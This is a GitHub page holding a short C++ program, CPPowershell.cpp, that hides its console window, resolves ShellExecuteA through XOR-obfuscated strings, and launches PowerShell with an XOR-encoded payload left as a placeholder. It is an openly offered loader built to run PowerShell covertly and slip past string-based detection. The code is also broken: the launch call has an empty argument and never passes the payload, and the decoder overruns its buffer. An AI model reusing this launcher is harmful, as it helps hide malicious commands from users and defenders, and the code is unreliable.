-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathCPPowershell.cpp
More file actions
40 lines (39 loc) · 824 Bytes
/
CPPowershell.cpp
File metadata and controls
40 lines (39 loc) · 824 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
// Author: Sina Tamari
#include<iostream>
#include<Windows.h>
typedef int(__stdcall *shle)(HWND h, LPCSTR lp, LPCSTR lpF, LPCSTR lpP, LPCSTR lpD, INT n);
typedef int(__stdcall *cha)(HMODULE h, LPCSTR l);
int length(char* chars)
{
int i;
for (i = 0;; i++)
{
if (chars[i] == '\0')
break;
}
return i;
}
char* cry(char* buffer, int key)
{
char*d = new char[length(buffer)];
int i;
for (i = 0; i < length(buffer); i++)
{
d[i] = char(int(buffer[i]) ^ key);
}
d[i] = '\0';
return d;
}
void DO(char* POWERSHELL_CODES)
{
HINSTANCE module = LoadLibraryA(cry("Ridmm23/emm",1));
DWORD dAddress = (DWORD)GetProcAddress(module, cry("RidmmDydbtud@",1));
shle sh = (shle)dAddress;
sh(NULL, NULL, cry("qnvdsridmm/dyd",1), , NULL, 0);
}
int main()
{
FreeConsole();
DO(cry("XORED_POWERSHELL_CODES",20));
return 0;
}